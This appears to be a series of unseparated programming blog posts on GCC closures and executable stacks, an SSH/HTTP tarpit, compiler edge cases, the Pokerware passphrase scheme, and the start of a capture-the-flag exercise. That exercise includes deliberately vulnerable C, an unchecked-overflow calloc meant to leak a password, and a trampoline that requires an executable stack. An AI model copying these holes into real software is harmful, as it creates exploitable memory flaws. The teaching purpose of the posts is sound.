In software development there are many concepts that at first glance seem useful and sound, but, after considering the consequences of their implementation and use, are actually horrifying. Examples include thread cancellation, variable length arrays, and memory aliasing. GCC’s closure extension to C is another, and this little feature compromises the entire GNU toolchain.
GCC has its own dialect of C called GNU C. One feature unique to GNU C is nested functions, which allow C programs to define functions inside other functions:
void intsort1(int *base, size_t nmemb)
{
int cmp(const void *a, const void *b)
{
return *(int *)a - *(int *)b;
}
qsort(base, nmemb, sizeof(*base), cmp);
}
The nested function above is straightforward and harmless. It’s nothing groundbreaking, and it is trivial for the compiler to implement. The cmp function is really just a static function whose scope is limited to the containing function, no different than a local static variable.
With one slight variation the nested function turns into a closure. This is where things get interesting:
void intsort2(int *base, size_t nmemb, _Bool invert)
{
int cmp(const void *a, const void *b)
{
int r = *(int *)a - *(int *)b;
return invert ? -r : r;
}
qsort(base, nmemb, sizeof(*base), cmp);
}
The invert variable from the outer scope is accessed from the inner scope. This has clean, proper closure semantics and works correctly just as you’d expect. It fits quite well with traditional C semantics. The closure itself is re-entrant and thread-safe. It’s automatically (read: stack) allocated, and so it’s automatically freed when the function returns, including when the stack is unwound via longjmp(). It’s a natural progression to support closures like this via nested functions. The eventual caller, qsort, doesn’t even know it’s calling a closure!
While this seems so useful and easy, its implementation has serious consequences that, in general, outweigh its benefits. In fact, in order to make this work, the whole GNU toolchain has been specially rigged!
How does it work? The function pointer, cmp, passed to qsort must somehow be associated with its lexical environment, specifically the invert variable. A static address won’t do. When I implemented closures as a toy library, I talked about the function address for each closure instance somehow needing to be unique.
GCC accomplishes this by constructing a trampoline on the stack. That trampoline has access to the local variables stored adjacent to it, also on the stack. GCC also generates a normal cmp function, like the simple nested function before, that accepts invert as an additional argument. The trampoline calls this function, passing the local variable as this additional argument.
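Conceptually, the trampoline is hand-rolled partial application: it fixes the extra invert argument and hands qsort a plain two-argument callable with its own unique address. In a language with first-class functions the same transformation looks like this (a Python sketch of the idea, not how GCC actually represents it):

```python
from functools import partial

# the "lifted" comparator: the captured variable becomes an
# explicit extra argument, as in GCC's generated cmp
def cmp(a, b, invert):
    r = a - b
    return -r if invert else r

# the trampoline's job: bind `invert` and expose a two-argument
# callable with its own unique identity
trampoline = partial(cmp, invert=True)
print(trampoline(1, 2))  # 1, because the comparison is inverted
```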
To illustrate this, I’ve manually implemented intsort2() below for x86-64 (System V ABI) without using GCC’s nested function extension:
int cmp(const void *a, const void *b, _Bool invert)
{
int r = *(int *)a - *(int *)b;
return invert ? -r : r;
}
void intsort3(int *base, size_t nmemb, _Bool invert)
{
unsigned long fp = (unsigned long)cmp;
volatile unsigned char buf[] = {
// mov edx, invert
0xba, invert, 0x00, 0x00, 0x00,
// mov rax, cmp
0x48, 0xb8, fp >> 0, fp >> 8, fp >> 16, fp >> 24,
fp >> 32, fp >> 40, fp >> 48, fp >> 56,
// jmp rax
0xff, 0xe0
};
int (*trampoline)(const void *, const void *) = (void *)buf;
qsort(base, nmemb, sizeof(*base), trampoline);
}
Here’s a complete example you can try yourself on nearly any x86-64 unix-like system: trampoline.c. It even works with Clang. The two notable systems where stack trampolines won’t work are OpenBSD and WSL.
(Note: The volatile is necessary because C compilers rightfully do not see the contents of buf as being consumed. Execution of the contents isn’t considered.)
In case you hadn’t already caught it, there’s a catch. The linker needs to link a binary that asks the loader for an executable stack (-z execstack):
$ cc -std=c99 -Os -Wl,-z,execstack trampoline.c
That’s because buf contains x86 code implementing the trampoline:
mov edx, invert ; assign third argument
mov rax, cmp ; store cmp address in RAX register
jmp rax ; jump to cmp
(Note: The absolute jump through a 64-bit register is necessary because the trampoline on the stack and the jump target will be very far apart. Further, these days the program will likely be compiled as a Position Independent Executable (PIE), so cmp might itself have a high address rather than load into the lowest 32 bits of the address space.)
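To make the encoding concrete, here’s a purely illustrative sketch (in Python) that assembles the same 17 bytes the C initializer builds, little-endian immediates and all:

```python
import struct

def trampoline_bytes(invert, cmp_addr):
    code  = b'\xba' + struct.pack('<I', invert)        # mov edx, imm32
    code += b'\x48\xb8' + struct.pack('<Q', cmp_addr)  # movabs rax, imm64
    code += b'\xff\xe0'                                # jmp rax
    return code

# same layout as the volatile buf[] above: 5 + 10 + 2 = 17 bytes
assert len(trampoline_bytes(1, 0x7f0000001000)) == 17
```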
However, executable stacks were phased out around 15 years ago because they make buffer overflows so much more dangerous! Attackers can inject and execute whatever code they like, typically shellcode. That’s why we need this unusual linker option.
You can see that the stack will be executable using our old friend, readelf:
$ readelf -l a.out
...
GNU_STACK 0x00000000 0x00000000 0x00000000
0x00000000 0x00000000 RWE 0x10
...
Note the “RWE” at the bottom right, meaning read-write-execute. This is a really bad sign in a real binary. Do any binaries installed on your system right now have an executable stack? I found one on mine. (Update: A major one was found in the comments by Walter Misar.)
When compiling the original version using a nested function there’s no need for that special linker option. That’s because GCC saw that it would need an executable stack and used this option automatically.
Or, more specifically, GCC stopped requesting a non-executable stack in the object file it produced. For the GNU Binutils linker, the default is an executable stack.
Since this is the default, the only way to get a non-executable stack is if every object file input to the linker explicitly declares that it does not need an executable stack. To request a non-executable stack, an object file must contain the (empty) section .note.GNU-stack.
If even a single object file fails to do this, then the final program
gets an executable stack.
Not only does one contaminated object file infect the binary, everything dynamically linked with it also gets an executable stack. Entire processes are infected! This occurs even via dlopen(), where the stack is dynamically made executable to accommodate the new shared object.
I’ve been bit myself. In Baking Data with Serialization I did it completely by accident, and I didn’t notice my mistake until three years later. The GNU linker outputs object files without the special note by default even though the object file only contains data.
$ echo hello world >hello.txt
$ ld -r -b binary -o hello.o hello.txt
$ readelf -S hello.o | grep GNU-stack
$
This is fixed with -z noexecstack:
$ ld -r -b binary -z noexecstack -o hello.o hello.txt
$ readelf -S hello.o | grep GNU-stack
[ 2] .note.GNU-stack PROGBITS 00000000 0000004c
$
This may happen any time you link object files not produced by GCC, such as output from the NASM assembler or hand-crafted object files.
Nested C closures are super slick, but they’re just not worth the risk of an executable stack, and they’re certainly not worth an entire toolchain failing open about it.
Update: A rebuttal. My short response is that the issue discussed in my article isn’t really about C the language but rather about an egregious issue with one particular toolchain. The problem doesn’t even arise if you use only C, but instead when linking in object files specifically not derived from C code.
I’m a big fan of tarpits: a network service that intentionally inserts delays in its protocol, slowing down clients by forcing them to wait. This arrests the speed at which a bad actor can attack or probe the host system, and it ties up some of the attacker’s resources that might otherwise be spent attacking another host. When done well, a tarpit imposes more cost on the attacker than the defender.
The Internet is a very hostile place, and anyone who’s ever stood up an Internet-facing IPv4 host has witnessed the immediate and continuous attacks against their server. I’ve maintained such a server for nearly six years now, and more than 99% of my incoming traffic has ill intent. One part of my defenses has been tarpits in various forms. The latest addition is an SSH tarpit I wrote a couple of months ago:
This program opens a socket and pretends to be an SSH server. However, it actually just ties up SSH clients with false promises indefinitely — or at least until the client eventually gives up. After cloning the repository, here’s how you can try it out for yourself (default port 2222):
$ make
$ ./endlessh &
$ ssh -p2222 localhost
Your SSH client will hang there and wait for at least several days before finally giving up. Like a mammoth in the La Brea Tar Pits, it got itself stuck and can’t get itself out. As I write, my Internet-facing SSH tarpit currently has 27 clients trapped in it. A few of these have been connected for weeks. In one particular spike it had 1,378 clients trapped at once, lasting about 20 hours.
My Internet-facing Endlessh server listens on port 22, which is the standard SSH port. I long ago moved my real SSH server off to another port where it sees a whole lot less SSH traffic — essentially none. This makes the logs a whole lot more manageable. And (hopefully) Endlessh convinces attackers not to look around for an SSH server on another port.
How does it work? Endlessh exploits a little paragraph in RFC 4253, the SSH protocol specification. Immediately after the TCP connection is established, and before negotiating the cryptography, both ends send an identification string:
SSH-protoversion-softwareversion SP comments CR LF
The RFC also notes:
The server MAY send other lines of data before sending the version string.
There is no limit on the number of lines, just that these lines must not begin with “SSH-“ since that would be ambiguous with the identification string, and lines must not be longer than 255 characters including CRLF. So Endlessh sends an endless stream of randomly-generated “other lines of data” without ever intending to send a version string. By default it waits 10 seconds between each line. This slows down the protocol, but prevents it from actually timing out.
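A compliant “other line” generator is tiny. Here’s a sketch in Python (the real Endlessh is C, and its exact line format may differ) that respects both constraints:

```python
import random

def banner_line():
    # random junk line: hex digits can never begin with "SSH-",
    # and the line stays well under 255 bytes including the CRLF
    line = '%x' % random.getrandbits(64)
    assert not line.startswith('SSH-')
    assert len(line) + 2 <= 255
    return line + '\r\n'
```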
This means Endlessh need not know anything about cryptography or the vast majority of the SSH protocol. It’s dead simple.
Ideally the tarpit’s resource footprint should be as small as possible. It’s just a security tool, and the server does have an actual purpose that doesn’t include being a tarpit. It should tie up the attacker’s resources, not the server’s, and should generally be unnoticeable. (Take note all those who write the awful “security” products I have to tolerate at my day job.)
Even when many clients have been trapped, Endlessh spends more than 99.999% of its time waiting around, doing nothing. It wouldn’t even be accurate to call it I/O-bound. If anything, it’s timer-bound, waiting around before sending off the next line of data. The most precious resource to conserve is memory.
The most straightforward way to implement something like Endlessh is a fork server: accept a connection, fork, and the child simply alternates between sleep(3) and write(2):
for (;;) {
ssize_t r;
char line[256];
sleep(DELAY);
generate_line(line);
r = write(fd, line, strlen(line));
if (r == -1 && errno != EINTR) {
exit(0);
}
}
A process per connection is a lot of overhead when connections are expected to be up hours or even weeks at a time. An attacker who knows about this could exhaust the server’s resources with little effort by opening up lots of connections.
A better option is, instead of processes, to create a thread per connection. On Linux this is practically the same thing, but it’s still better. However, you still have to allocate a stack for the thread and the kernel will have to spend some resources managing the thread.
For Endlessh I went for an even more lightweight version: a single-threaded poll(2) server, analogous to stackless green threads. The overhead per connection is about as low as it gets.
Clients that are being delayed are not registered in poll(2). Their only overhead is the socket object in the kernel, and another 78 bytes to track them in Endlessh. Most of those bytes are used only for accurate logging. Only those clients that are overdue for a new line are registered for poll(2).
When clients are waiting, but no clients are overdue, poll(2) is essentially used in place of sleep(3). Though since it still needs to manage the accept server socket, it (almost) never actually waits on nothing.
There’s an option to limit the total number of client connections so that it doesn’t get out of hand. In this case it will stop polling the accept socket until a client disconnects. I probably shouldn’t have bothered with this option and instead relied on ulimit, a feature already provided by the operating system.
I could have used epoll (Linux) or kqueue (BSD), which would be much more efficient than poll(2). The problem with poll(2) is that it’s constantly registering and unregistering Endlessh on each of the overdue sockets each time around the main loop. This is by far the most CPU-intensive part of Endlessh, and it’s all inflicted on the kernel. Most of the time, even with thousands of clients trapped in the tarpit, only a small number of them are polled at once, so I opted for better portability instead.
One consequence of not polling connections that are waiting is that disconnections aren’t noticed in a timely fashion. This makes the logs less accurate than I like, but otherwise it’s pretty harmless. Unfortunately, even if I wanted to fix this, the poll(2) interface isn’t quite equipped for it anyway.
With a poll(2) server, the biggest overhead remaining is in the kernel, where it allocates send and receive buffers for each client and manages the proper TCP state. The next step to reducing this overhead is Endlessh opening a raw socket and speaking TCP itself, bypassing most of the operating system’s TCP/IP stack.
Much of the TCP connection state doesn’t matter to Endlessh and doesn’t need to be tracked. For example, it doesn’t care about any data sent by the client, so no receive buffer is needed, and any data that arrives could be dropped on the floor.
Even more, raw sockets would allow for some even nastier tarpit tricks. Despite the long delays between data lines, the kernel itself responds very quickly on the TCP layer and below. ACKs are sent back quickly and so on. An astute attacker could detect that the delay is artificial, imposed above the TCP layer by an application.
If Endlessh worked at the TCP layer, it could tarpit the TCP protocol itself. It could introduce artificial “noise” to the connection that requires packet retransmissions, delay ACKs, etc. It would look a lot more like network problems than a tarpit.
I haven’t taken Endlessh this far, nor do I plan to do so. At the moment attackers either have a hard timeout, so this wouldn’t matter, or they’re pretty dumb and Endlessh already works well enough.
Since writing Endlessh I’ve learned about Python’s asyncio, and it’s actually a near perfect fit for this problem. I should have just used it in the first place. The hard part is already implemented within asyncio, and the problem isn’t CPU-bound, so being written in Python doesn’t matter.
Here’s a simplified (no logging, no configuration, etc.) version of Endlessh implemented in about 20 lines of Python 3.7:
import asyncio
import random
async def handler(_reader, writer):
try:
while True:
await asyncio.sleep(10)
writer.write(b'%x\r\n' % random.randint(0, 2**32))
await writer.drain()
except ConnectionResetError:
pass
async def main():
server = await asyncio.start_server(handler, '0.0.0.0', 2222)
async with server:
await server.serve_forever()
asyncio.run(main())
Since Python coroutines are stackless, the per-connection memory overhead is comparable to the C version. So it seems asyncio is perfectly suited for writing tarpits! Here’s an HTTP tarpit to trip up attackers trying to exploit HTTP servers. It slowly sends a random, endless HTTP header:
import asyncio
import random
async def handler(_reader, writer):
writer.write(b'HTTP/1.1 200 OK\r\n')
try:
while True:
await asyncio.sleep(5)
header = random.randint(0, 2**32)
value = random.randint(0, 2**32)
writer.write(b'X-%x: %x\r\n' % (header, value))
await writer.drain()
except ConnectionResetError:
pass
async def main():
server = await asyncio.start_server(handler, '0.0.0.0', 8080)
async with server:
await server.serve_forever()
asyncio.run(main())
Try it out for yourself. Firefox and Chrome will spin on that server for hours before giving up. I have yet to see curl actually time out on its own in the default settings (--max-time / -m does work correctly, though).
Parting exercise for the reader: Using the examples above as a starting point, implement an SMTP tarpit using asyncio. Bonus points for using TLS connections and testing it against real spammers.
So far this year I’ve been bitten three times by compiler edge cases in GCC and Clang, each time catching me totally by surprise. Two were caused by historical artifacts, where an ambiguous specification led to diverging implementations. The third was a compiler optimization being far more clever than I expected, behaving almost like an artificial intelligence.
In all examples I’ll be using GCC 7.3.0 and Clang 6.0.0 on Linux.
The first time I was bit — or, well, narrowly avoided being bit — was when I examined a missed floating point optimization in both Clang and GCC. Consider this function:
double
zero_multiply(double x)
{
return x * 0.0;
}
The function multiplies its argument by zero and returns the result. Any number multiplied by zero is zero, so this should always return zero, right? Unfortunately, no. IEEE 754 floating point arithmetic supports NaN, infinities, and signed zeros. This function can return NaN, positive zero, or negative zero. (In some cases, the operation could also potentially produce a hardware exception.)
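These edge cases are easy to check in any IEEE 754 environment. For instance, in Python, whose floats are IEEE 754 doubles:

```python
import math

assert math.isnan(float('nan') * 0.0)   # NaN propagates through the multiply
assert math.isnan(float('inf') * 0.0)   # infinity times zero is NaN
neg = -1.0 * 0.0                        # a negative operand yields -0.0
assert math.copysign(1.0, neg) == -1.0  # the sign bit is set...
assert neg == 0.0                       # ...though it compares equal to 0.0
```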
As a result, both GCC and Clang perform the multiply:
zero_multiply:
xorpd xmm1, xmm1
mulsd xmm0, xmm1
ret
The -ffast-math option relaxes the C standard floating point rules, permitting an optimization at the cost of conformance and consistency:
zero_multiply:
xorps xmm0, xmm0
ret
Side note: -ffast-math doesn’t necessarily mean “less precise.” Sometimes it will actually improve precision.
Here’s a modified version of the function that’s a little more interesting. I’ve changed the argument to a short:
double
zero_multiply_short(short x)
{
return x * 0.0;
}
It’s no longer possible for the argument to be one of those special values. The short will be promoted to one of 65,536 possible double values, each of which results in 0.0 when multiplied by 0.0. GCC misses this optimization (-Os):
zero_multiply_short:
movsx edi, di ; sign-extend 16-bit argument
xorps xmm1, xmm1 ; xmm1 = 0.0
cvtsi2sd xmm0, edi ; convert int to double
mulsd xmm0, xmm1
ret
Clang also misses this optimization:
zero_multiply_short:
cvtsi2sd xmm1, edi
xorpd xmm0, xmm0
mulsd xmm0, xmm1
ret
But hang on a minute. This is shorter by one instruction. What happened to the sign-extension (movsx)? Clang is treating that short argument as if it were a 32-bit value. Why do GCC and Clang differ? Is GCC doing something unnecessary?
It turns out that the x86-64 ABI didn’t specify what happens with the upper bits in argument registers. Are they garbage? Are they zeroed? GCC takes the conservative position of assuming the upper bits are arbitrary garbage. Clang takes the boldest position of assuming arguments smaller than 32 bits have been promoted to 32 bits by the caller. This is what the ABI specification should have said, but currently it does not.
Fortunately GCC is also conservative when passing arguments. It promotes arguments to 32 bits as necessary, so there are no conflicts when linking against Clang-compiled code. However, this is not true for Intel’s ICC compiler: Clang and ICC are not ABI-compatible on x86-64.
I don’t use ICC, so that particular issue wouldn’t bite me, but if I was ever writing assembly routines that called Clang-compiled code, I’d eventually get bit by this.
Without looking it up or trying it, what does this function return? Think carefully.
int
float_compare(void)
{
float x = 1.3f;
return x == 1.3f;
}
Confident in your answer? This is a trick question, because it can return either 0 or 1 depending on the compiler. Boy was I confused when this comparison returned 0 in my real world code.
$ gcc -std=c99 -m32 cmp.c # float_compare() == 0
$ clang -std=c99 -m32 cmp.c # float_compare() == 1
So what’s going on here? The original ANSI C specification wasn’t clear about how intermediate floating point values get rounded, and implementations all did it differently. The C99 specification cleaned this all up and introduced FLT_EVAL_METHOD. Implementations can still differ, but at least you can now determine at compile-time what the compiler would do by inspecting that macro.
Back in the late 1980’s or early 1990’s when the GCC developers were
deciding how GCC should implement floating point arithmetic, the trend
at the time was to use as much precision as possible. On the x86 this
meant using its support for 80-bit extended precision floating point
arithmetic. Floating point operations are performed in long double
precision and truncated afterward (FLT_EVAL_METHOD == 2).
In float_compare() the left-hand side is truncated to a float by the assignment, but the right-hand side, despite being a float literal, is actually “1.3” at 80 bits of precision as far as GCC is concerned. That’s pretty unintuitive!
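The same class of surprise can be reproduced without x87 hardware: rounding 1.3 to single precision and comparing it against the double 1.3 fails for the analogous reason. Here’s a Python sketch that uses struct to emulate a C float assignment:

```python
import struct

def to_float32(x):
    # round-trip through IEEE 754 single precision, like
    # assigning a double to a C float variable
    return struct.unpack('<f', struct.pack('<f', x))[0]

# 1.3 is not exactly representable; its single- and
# double-precision roundings are different numbers
assert to_float32(1.3) != 1.3
assert to_float32(1.5) == 1.5  # exactly representable values survive
```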
The remnants of this high precision trend are still in JavaScript, where all arithmetic is double precision (even if simulated using integers), and great pains have been made to work around the performance consequences of this. Until recently, Mono had similar issues.
The trend reversed once SIMD hardware became widely available and
there were huge performance gains to be had. Multiple values could be
computed at once, side by side, at lower precision. So on x86-64, this became the default (FLT_EVAL_METHOD == 0). The young Clang compiler
wasn’t around until well after this trend reversed, so it behaves
differently than the backwards compatible GCC on the old x86.
I’m a little ashamed that I’m only finding out about this now. However, by the time I was competent enough to notice and understand this issue, I was already doing nearly all my programming on the x86-64.
I’ve saved this one for last since it’s my favorite. Suppose we have this little function, new_image(), that allocates a greyscale image for, say, some multimedia library.
static unsigned char *
new_image(size_t w, size_t h, int shade)
{
unsigned char *p = 0;
if (w == 0 || h <= SIZE_MAX / w) { // overflow?
p = malloc(w * h);
if (p) {
memset(p, shade, w * h);
}
}
return p;
}
It’s a static function because this would be part of some slick header library (and, secretly, because it’s necessary for illustrating the issue). Being a responsible citizen, the function even checks for integer overflow before allocating anything.
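The overflow guard works because the multiplication would otherwise silently wrap modulo 2^64. Simulating size_t arithmetic in Python makes the failure mode explicit (SIZE_MAX here assumes a 64-bit size_t):

```python
SIZE_MAX = 2**64 - 1  # assuming a 64-bit size_t

w, h = 2, SIZE_MAX
wrapped = (w * h) % 2**64        # what the C expression w * h computes
assert wrapped == SIZE_MAX - 1   # wrapped, not the true product 2**65 - 2

# the overflow check in new_image() rejects these dimensions
assert not (w == 0 or h <= SIZE_MAX // w)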
I write a unit test to make sure it detects overflow. This function should return 0.
/* expected return == 0 */
int
test_new_image_overflow(void)
{
void *p = new_image(2, SIZE_MAX, 0);
return !!p;
}
So far my test passes. Good.
I’d also like to make sure it correctly returns NULL — or, more specifically, that it doesn’t crash — if the allocation fails. But how can I make malloc() fail? As a hack I can pass image dimensions that I know cannot ever practically be allocated. Essentially I want to force a malloc(SIZE_MAX), e.g. allocate every available byte in my virtual address space. For a conventional 64-bit machine, that’s 16 exbibytes of memory, and it leaves space for nothing else, including the program itself.
/* expected return == 0 */
int
test_new_image_oom(void)
{
void *p = new_image(1, SIZE_MAX, 0xff);
return !!p;
}
I compile with GCC, test passes. I compile with Clang and the test fails. That is, the test somehow managed to allocate 16 exbibytes of memory, and initialize it. Wat?
Disassembling the test reveals what’s going on:
test_new_image_overflow:
xor eax, eax
ret
test_new_image_oom:
mov eax, 1
ret
The first test is actually being evaluated at compile time by the compiler. The function being tested was inlined into the unit test itself. This permits the compiler to collapse the whole thing down to a single instruction. The path with malloc() became dead code and was trivially eliminated.
In the second test, Clang correctly determined that the image buffer is not actually being used, despite the memset(), so it eliminated the allocation altogether and then simulated a successful allocation despite it being absurdly large. Allocating memory is not an observable side effect as far as the language specification is concerned, so it’s allowed to do this. My thinking was wrong, and the compiler outsmarted me.
I soon realized I can take this further and trick Clang into performing an invalid optimization, revealing a bug. Consider this slightly-optimized version that uses calloc() when the shade is zero (black). The calloc() function does its own overflow check, so new_image() doesn’t need to do it.
static void *
new_image(size_t w, size_t h, int shade)
{
unsigned char *p = 0;
if (shade == 0) { // shortcut
p = calloc(w, h);
} else if (w == 0 || h <= SIZE_MAX / w) { // overflow?
p = malloc(w * h);
if (p) {
memset(p, shade, w * h);
}
}
return p;
}
With this change, my overflow unit test is now also failing. The situation is even worse than before. The calloc() is being eliminated despite the overflow, and replaced with a simulated success. This time it’s actually a bug in Clang. While failing a unit test is mostly harmless, this could introduce a vulnerability in a real program. The OpenBSD folks are so worried about this sort of thing that they’ve disabled this optimization.
Here’s a slightly-contrived example of this. Imagine a program that maintains a table of unsigned integers, and we want to keep track of how many times the program has accessed each table entry. The “access counter” table is initialized to zero, but the table of values need not be initialized, since they’ll be written before first access (or something like that).
struct table {
unsigned *counter;
unsigned *values;
};
static int
table_init(struct table *t, size_t n)
{
t->counter = calloc(n, sizeof(*t->counter));
if (t->counter) {
/* Overflow already tested above */
t->values = malloc(n * sizeof(*t->values));
if (!t->values) {
free(t->counter);
return 0; // fail
}
return 1; // success
}
return 0; // fail
}
This function relies on the overflow test in calloc() for the second malloc() allocation. However, this is a static function that’s likely to get inlined, as we saw before. If the program doesn’t actually make use of the counter table, and Clang is able to statically determine this fact, it may eliminate the calloc(). This would also eliminate the overflow test, introducing a vulnerability. If an attacker can control n, then they can overwrite arbitrary memory through that values pointer.
Besides this surprising little bug, the main lesson for me is that I should probably isolate unit tests from the code being tested. The easiest solution is to put them in separate translation units and don’t use link-time optimization (LTO). Allowing tested functions to be inlined into the unit tests is probably a bad idea.
The unit test issues in my real program, which was a bit more sophisticated than what was presented here, gave me artificial intelligence vibes. It’s that situation where a computer algorithm did something really clever and I felt it outsmarted me. It’s creepy to consider how far that can go. I’ve gotten that even from observing AI I’ve written myself, and I know for sure no human taught it some particularly clever trick.
My favorite AI story along these lines is about an AI that learned how to play games on the Nintendo Entertainment System. It didn’t understand the games it was playing. Its optimization task was simply to choose controller inputs that maximized memory values, because that’s generally associated with doing well — higher scores, more progress, etc. The most unexpected part came when playing Tetris. Eventually the screen would fill up with blocks, and the AI would face the inevitable situation of losing the game, with all that memory being reinitialized to low values. So what did it do?
Just before the end it would pause the game and wait… forever.
There are various flavors of two different word lists here:
Hardware random number generators are difficult to verify and may not actually be as random as they promise, either intentionally or unintentionally. For the particularly paranoid, Diceware and Pokerware are an easily verifiable alternative for generating secure passphrases for cryptographic purposes. At any time, a deck of 52 playing cards is in one of 52! possible arrangements. That’s more than 225 bits of entropy. If you give your deck a thorough shuffle, it will be in an arrangement that has never been seen before and will never be seen again. Pokerware draws on some of these bits to generate passphrases.
The Pokerware list has 5,304 words (12.4 bits per word), compared to Diceware’s 7,776 words (12.9 bits per word). My goal was to invent a card-drawing scheme that would uniformly select from a list in the same sized ballpark as Diceware. Much smaller and you’d have to memorize more words for the same passphrase strength. Much larger and the words on the list would be more difficult to memorize, since the list would contain longer and less frequently used words. Diceware strikes a nice balance at five dice.
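The entropy figures are straightforward to verify:

```python
import math

# a shuffled 52-card deck has 52! arrangements
assert math.log2(math.factorial(52)) > 225

# bits per word for each list
assert round(math.log2(5304), 1) == 12.4   # Pokerware
assert round(math.log2(7776), 1) == 12.9   # Diceware
```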
One important difference for me is that I like my Pokerware word lists a lot more than the two official Diceware lists. My lists only have simple, easy-to-remember words (for American English speakers, at least), without any numbers or other short non-words. Pokerware has two official lists, “formal” and “slang,” since my early testers couldn’t agree on which was better. Rather than make a difficult decision, I took the usual route of making no decision at all.
The “formal” list is derived in part from Google’s Ngram Viewer, with my own additional filters and tweaking. It’s called “formal” because the ngrams come from formal publications and represent more formal kinds of speech.
The “slang” list is derived from every reddit comment between December 2005 and May 2017, tamed by the same additional filters. I have this data on hand, so I may as well put it to use. I figured more casually-used words would be easier to remember. Due to my extra filtering, there’s actually a lot of overlap between these lists, so the differences aren’t too significant.
If you have your own word list, perhaps in a different language, you can use the Makefile in the repository to build your own Pokerware lookup table, both plain text and PDF. The PDF is generated using Groff macros.
Thoroughly shuffle the deck.
Draw two cards. Sort them by value, then suit. Suits are in alphabetical order: Clubs, Diamonds, Hearts, Spades.
Draw additional cards until you get a card that doesn’t match the face value of either of your initial two cards. Observe its suit.
Using your two cards and observed suit, look up a word in the table.
Place all cards back in the deck, shuffle, and repeat from step 2 until you have the desired number of words. Each word is worth 12.4 bits of entropy.
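The procedure’s numbers check out: step 2 selects one of C(52,2) = 1,326 unordered pairs, and step 3 adds one of 4 suits, which is exactly the 5,304 table entries. Here’s a Python sketch using a hypothetical index scheme (the real table’s ordering may differ):

```python
from itertools import combinations

SUITS = 'CDHS'                       # alphabetical, per step 2
VALUES = '23456789TJQKA'
deck = sorted(v + s for v in VALUES for s in SUITS)

pairs = list(combinations(deck, 2))  # every possible two-card draw
assert len(pairs) == 1326
assert len(pairs) * len(SUITS) == 5304  # one entry per word in the list

# a hypothetical lookup index for (pair, extra suit)
def word_index(pair, suit):
    return pairs.index(tuple(sorted(pair))) * 4 + SUITS.index(suit)

assert 0 <= word_index(('KH', 'QC'), 'S') < 5304
```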
A word of warning about step 4: If you use software to do the word list lookup, beware that it might save your search/command history — and therefore your passphrase — to a file. For example, the less pager will store search history in ~/.lesshst. It’s easy to prevent that one:
$ LESSHISTFILE=- less pokerware-slang.txt
Suppose in step 2 you draw King of Hearts (KH/K♥) and Queen of Clubs (QC/Q♣).
In step 3 you first draw King of Diamonds (KD/K♦), discarding it because it matches the face value of one of your cards from step 2.
Next you draw Four of Spades (4S/4♠), taking spades as your extra suit.
In order, this gives you Queen of Clubs, King of Hearts, and Spades: QCKHS or Q♣K♥♠. This corresponds to “wizard” in the formal word list and would be the first word in your passphrase.
I now have an excuse to keep a deck of cards out on my desk at work. I’ve been using Diceware — or something approximating it since I’m not so paranoid about hardware RNGs — for passwords for over 8 years now. From now on I’ll deal new passwords from an in-reach deck of cards. Though typically I need to tweak the results to meet outdated character-composition requirements.
This small C program converts a vector image from a custom format (described below) into a Netpbm image, a conveniently simple format. The program defensively and carefully parses its input, but still makes a subtle, fatal mistake. This mistake not only leads to sensitive information disclosure, but, with a more sophisticated attack, could be used to execute arbitrary code.
After getting the hang of the interface for the program, I encourage you to take some time to work out an exploit yourself. Regardless, I’ll reveal a functioning exploit and explain how it works.
The input format is line-oriented and very similar to Netpbm itself. The
first line is the header, starting with the magic number V2
(ASCII)
followed by the image dimensions. The target output format is Netpbm’s
“P2” (text gray scale) format, so the “V2” parallels it. The file must end
with a newline.
V2 <width> <height>
What follows are drawing commands, one per line. For example, the s command sets the value of a particular pixel.
s <x> <y> <00-ff>
Since it’s not important for the demonstration, this is the only command I implemented. It’s easy to imagine additional commands to draw lines, circles, Bezier curves, etc.
Here’s an example (example.txt) that draws a single white point in the middle of the image:
V2 256 256
s 127 127 ff
The rendering tool reads from standard input and writes to standard output:
$ render < example.txt > example.pgm
Here’s what it looks like rendered:
However, you will notice that when you run the rendering tool, it prompts you for username and password. This is silly, of course, but it’s an excuse to get “sensitive” information into memory. It will accept any username/password combination where the username and password don’t match each other. The key is this: It’s possible to craft a valid image that leaks the entered password.
Without spoiling anything yet, let’s look at how this program works. The first thing to notice is that I’m using a custom “obstack” allocator instead of malloc() and free(). Real-world allocators have some defenses against this particular vulnerability. Plus a specific exploit would have to target a specific libc. By using my own allocator, the exploit will mostly be portable, making for a better and easier demonstration.
The allocator interface should be pretty self-explanatory, except for two
details. This is an obstack allocator, so freeing an object also frees
every object allocated after it. Also, it doesn’t call malloc()
in the
background. At initialization you give it a buffer from which to allocate
all memory.
struct mstack {
char *top;
char *max;
char buf[];
};
struct mstack *mstack_init(void *, size_t);
void *mstack_alloc(struct mstack *, size_t);
void mstack_free(struct mstack *, void *);
There are no vulnerabilities in these functions (I hope!). It’s just here for predictability.
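The allocator’s internals aren’t shown here, so this is a minimal sketch of how the three functions could behave per the description above: a bump allocator whose free rewinds the top pointer, releasing the given object and everything allocated after it. The article’s real implementation may differ in details such as alignment.

```c
#include <stddef.h>

struct mstack {
    char *top;
    char *max;
    char buf[];
};

/* Carve an mstack out of the caller-provided buffer. */
struct mstack *
mstack_init(void *buf, size_t size)
{
    if (size < sizeof(struct mstack))
        return 0;
    struct mstack *m = buf;
    m->top = m->buf;
    m->max = (char *)buf + size;
    return m;
}

/* Bump allocation: just advance the top pointer. */
void *
mstack_alloc(struct mstack *m, size_t size)
{
    if ((size_t)(m->max - m->top) < size)
        return 0;  /* not enough room */
    void *p = m->top;
    m->top += size;
    return p;
}

/* Obstack semantics: frees p and every later allocation. */
void
mstack_free(struct mstack *m, void *p)
{
    m->top = p;
}
```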
Next here’s the “authentication” function. It reads a username and password combination from /dev/tty. It’s only an excuse to get a flag in memory for this capture-the-flag game. The username and password must be less than 32 characters each.
int
authenticate(struct mstack *m)
{
FILE *tty = fopen("/dev/tty", "r+");
if (!tty) {
perror("/dev/tty");
return 0;
}
char *user = mstack_alloc(m, 32);
if (!user) {
fclose(tty);
return 0;
}
fputs("User: ", tty);
fflush(tty);
if (!fgets(user, 32, tty))
user[0] = 0;
char *pass = mstack_alloc(m, 32);
int result = 0;
if (pass) {
fputs("Password: ", tty);
fflush(tty);
if (fgets(pass, 32, tty))
result = strcmp(user, pass) != 0;
}
fclose(tty);
mstack_free(m, user);
return result;
}
Next here’s a little version of calloc()
for the custom allocator. Hmm,
I wonder why this is called “naive”…
void *
naive_calloc(struct mstack *m, unsigned long nmemb, unsigned long size)
{
void *p = mstack_alloc(m, nmemb * size);
if (p)
memset(p, 0, nmemb * size);
return p;
}
